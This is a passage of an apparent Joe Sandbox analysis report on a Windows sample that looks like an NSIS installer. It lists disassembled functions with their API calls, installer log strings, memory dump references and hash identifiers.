                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                            • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                            • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

                                                                                                                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                                                                                                                            Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                            • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                            • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                            • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                            • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                            • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                            • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                            Function 00406CC7 Relevance: 31.7, APIs: 9, Strings: 9, Instructions: 190filestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                            • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                            • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                            • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                            • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                            • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                            • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                            • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                            • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                            • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                            • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                            Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                            • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                            • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                            • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                              • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                            • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                            • String ID: F$A
                                                                                                                                                                                                                                                                                            • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                            • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                            • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                            Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                            • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                            • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                            • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                            • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                            • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                            Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042B018,771B23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                            • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                            • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                            • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                            • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                            Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateInstance
                                                                                                                                                                                                                                                                                            • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                            • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                            • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                            • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                            Function 004079A2 Relevance: .3, Instructions: 347COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1251042645.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_pM3fQBuTLy.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                            • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                            Function 0040737E Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1250530574.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250309223.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250794113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1250824194.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
